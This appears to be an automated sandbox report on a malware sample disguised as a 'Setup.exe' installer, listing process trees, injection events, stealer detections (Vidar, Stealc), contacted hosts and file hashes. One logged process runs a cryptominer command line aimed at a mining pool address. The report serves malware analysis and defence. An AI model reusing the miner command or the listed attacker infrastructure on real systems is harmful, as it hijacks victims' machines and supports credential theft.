PID 3636 wrote to memory of 3720 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
PID 4500 wrote to memory of 4644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2916 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:3

C:\ProgramData\DHDAKFCGIJ.exe

"C:\ProgramData\DHDAKFCGIJ.exe"

C:\ProgramData\AFBAKKFCBF.exe

"C:\ProgramData\AFBAKKFCBF.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 poocoin.online udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 18.53.55.162.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 104.21.16.123:443 businessdownloads.ltd tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 123.16.21.104.in-addr.arpa udp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.196.193:443 i.imgur.com tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
US 8.8.8.8:53 udp
DE 162.55.53.18:9000 162.55.53.18 tcp
FI 135.181.22.88:80 135.181.22.88 tcp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 88.22.181.135.in-addr.arpa udp
FI 65.109.127.181:3333 tcp

Files

memory/2144-0-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2144-1-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/2144-11-0x0000000059800000-0x000000005986E000-memory.dmp

memory/2144-13-0x0000000057800000-0x0000000057812000-memory.dmp

memory/2144-14-0x0000000057000000-0x000000005703F000-memory.dmp

memory/2144-12-0x0000000050000000-0x0000000050116000-memory.dmp

memory/2144-10-0x0000000000400000-0x0000000000698000-memory.dmp

memory/2144-16-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2144-15-0x0000000050120000-0x000000005030D000-memory.dmp

memory/2144-17-0x00000000744F2000-0x00000000744F4000-memory.dmp

memory/2144-18-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2144-19-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2612-28-0x00000000744E0000-0x000000007465B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\30952b7c

MD5 c72dbe62a344b8d98ae6fe1c28e7fb19
SHA1 0374c999e0f43dae3cc98c741f25761b29316ca7
SHA256 97a5b686037eaedcdfb2ad97529c830ef44a23d21092cfdfbe0c7281727bce84
SHA512 e50b5fd956793b0913f79921714de2bd021906b17b46a123e42a5dbe8dc4995a4c9cd2c30c3db0bd30404bbae3e4f7fc0270c11326d69613f36ad3c9407acf39

memory/2612-30-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/2612-32-0x00000000744E0000-0x000000007465B000-memory.dmp

memory/2612-33-0x00000000744E0000-0x000000007465B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/4292-39-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-41-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-42-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-45-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-46-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\ProgramData\HDGIEBGHDAEB\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\HDGIEBGHDAEB\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/4292-123-0x0000000001400000-0x0000000001B4C000-memory.dmp

C:\ProgramData\DHDAKFCGIJ.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/4704-139-0x0000000000400000-0x0000000000913000-memory.dmp

memory/4292-140-0x0000000001400000-0x0000000001B4C000-memory.dmp

C:\ProgramData\AFBAKKFCBF.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/1280-155-0x0000000000D50000-0x0000000000F98000-memory.dmp

memory/4704-161-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58822b52

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/4704-162-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/1280-164-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\58ce8638

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/1280-165-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-166-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-173-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4704-174-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a55639c

MD5 24ee63d61846d5c681fd11bc175b8677
SHA1 85dd0289b1b9d2815db5824ad7b9b30a8b344f36
SHA256 5ba7fccb1d10ab49f67ee3bc798ec3526deb40884a25f284d53e35df06d19189
SHA512 63b83c530f118a7b7d2ca4aa3b72ea488a86447a100a046da1fc4b32a9a8c0d5addf195545db781c17cdfc92510d95960a12c341ca8ba3329851ea6825409c95

memory/1280-177-0x0000000072B10000-0x0000000072C8B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5a757ad9

MD5 038e252a69760e572c5d8195d91bed8e
SHA1 29b052cedbb9eec939a7cc26970dedf3f8251bab
SHA256 ea0c6eb3cdf3aade407c22e3a13c47b4942d61041ed59aa9f41100043aadb4b2
SHA512 24174e8cd3a02aa76f3fc35aa55e2a6aa412da294ce80b368c7d57edc5ac7f7e6ee002b3dd3d48ec517b74a500e270cb3efce3ceac4cf10c31e189b9199a066f

memory/3636-180-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4112-181-0x00007FFEAA610000-0x00007FFEAA805000-memory.dmp

memory/4292-182-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4112-183-0x0000000072B10000-0x0000000072C8B000-memory.dmp

memory/4292-193-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4292-194-0x0000000001400000-0x0000000001B4C000-memory.dmp

memory/4112-195-0x0000000072B10000-0x0000000072C8B000-memory.dmp

memory/4500-202-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240611-en

Max time kernel

140s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\rtl120.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 228

Network

N/A

Files

memory/2892-0-0x0000000050000000-0x0000000050116000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240226-en

Max time kernel

140s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1480 wrote to memory of 1964 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240508-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240419-en

Max time kernel

149s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2052 set thread context of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2052 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1800 wrote to memory of 2828 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2828 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 148

Network

N/A

Files

memory/2052-0-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-1-0x0000000076FC0000-0x0000000077169000-memory.dmp

memory/2052-10-0x00000000740F2000-0x00000000740F4000-memory.dmp

memory/2052-11-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-12-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-14-0x0000000000400000-0x0000000000698000-memory.dmp

memory/2052-21-0x0000000057800000-0x0000000057812000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\83edb132

MD5 20233f925c44eda22f83727c6eebe376
SHA1 3efd0b0161a0314d3061bc94db9b92da1cecb671
SHA256 3c8a28f017c8e76f29a32d33dfb8b6a1c1706c94d371e4abcac462abd6ac2255
SHA512 dc82cb6189c22a8d383e479deea3772d5b4a2f4d6bc0eaabe735ad109588fe5f744849008976caf6560645493a7af2f55f1723b237d3da126b57f17aaafb9051

memory/2052-22-0x0000000050310000-0x0000000050349000-memory.dmp

memory/2052-19-0x0000000050120000-0x000000005030D000-memory.dmp

memory/1800-20-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/2052-18-0x0000000057000000-0x000000005703F000-memory.dmp

memory/2052-17-0x0000000059800000-0x000000005986E000-memory.dmp

memory/2052-15-0x0000000050000000-0x0000000050116000-memory.dmp

memory/1800-23-0x0000000076FC0000-0x0000000077169000-memory.dmp

memory/1800-25-0x00000000740E0000-0x0000000074254000-memory.dmp

memory/1800-26-0x00000000740E0000-0x0000000074254000-memory.dmp

\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2828-32-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2828-31-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2828-34-0x0000000000B30000-0x000000000127C000-memory.dmp

memory/2828-43-0x0000000000B30000-0x000000000127C000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win7-20240220-en

Max time kernel

119s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2468 wrote to memory of 1888 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\vcl120.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\VSLauncher_[0MB]_[1].exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
BE 88.221.83.224:443 www.bing.com tcp
BE 88.221.83.224:443 www.bing.com tcp
US 8.8.8.8:53 224.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 201.64.52.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

113s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4172,i,8447163055677043976,7218082390179600880,262144 --variations-seed-version --mojo-platform-channel-handle=3756 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 13.107.42.16:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 35.166.122.92.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-18 14:48

Reported

2024-06-18 14:50

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\#!~#0PEn_9797_P@$SW0rd~!^!!$\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
BE 88.221.83.200:443 www.bing.com tcp
